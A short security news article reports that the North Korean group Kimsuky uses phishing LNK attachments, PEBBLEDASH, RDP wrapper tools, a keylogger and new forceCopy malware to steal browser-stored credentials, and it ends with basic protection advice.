North Korean hackers are using forceCopy malware to steal browser-stored credentials, according to a recent report. The hacking group Kimsuky is behind a new wave of spear-phishing attacks targeting victims through malicious email attachments.
The attack begins with a phishing email containing a Windows shortcut (LNK) file. This file is disguised as a Microsoft Office or PDF document. When opened, it triggers PowerShell or mshta.exe, which downloads and executes malicious payloads from an external source.
How the Attack Works
Hackers deploy various malware strains to infiltrate victim systems. They use a trojan called PEBBLEDASH, a modified RDP Wrapper tool, and proxy malware to establish a persistent connection with infected machines. These tools allow remote access and control over compromised systems.
Additionally, the attackers deploy a PowerShell-based keylogger to record keystrokes. The newly discovered forceCopy malware is designed to steal files from web browsers. Hackers specifically target browser directories where credentials are stored.
Kimsuky’s Strategy and Evolution
The Kimsuky hacking group, also known as APT43, has a history of social engineering attacks. In the past, they primarily used custom backdoors to control infected systems. However, recent reports suggest they are now leveraging RDP proxies and wrapper tools to maintain access.
Kimsuky has been active since at least 2012. Their operations focus on bypassing email security through well-crafted phishing messages. In late 2024, researchers uncovered a campaign using Russian email services to steal credentials.
How to Stay Protected
To prevent forceCopy malware attacks, never open unexpected email attachments. Always verify the sender’s identity and avoid clicking on suspicious links. Keep security software updated and enable multi-factor authentication for added protection. Using email filters and browser security settings can also help block phishing attempts.
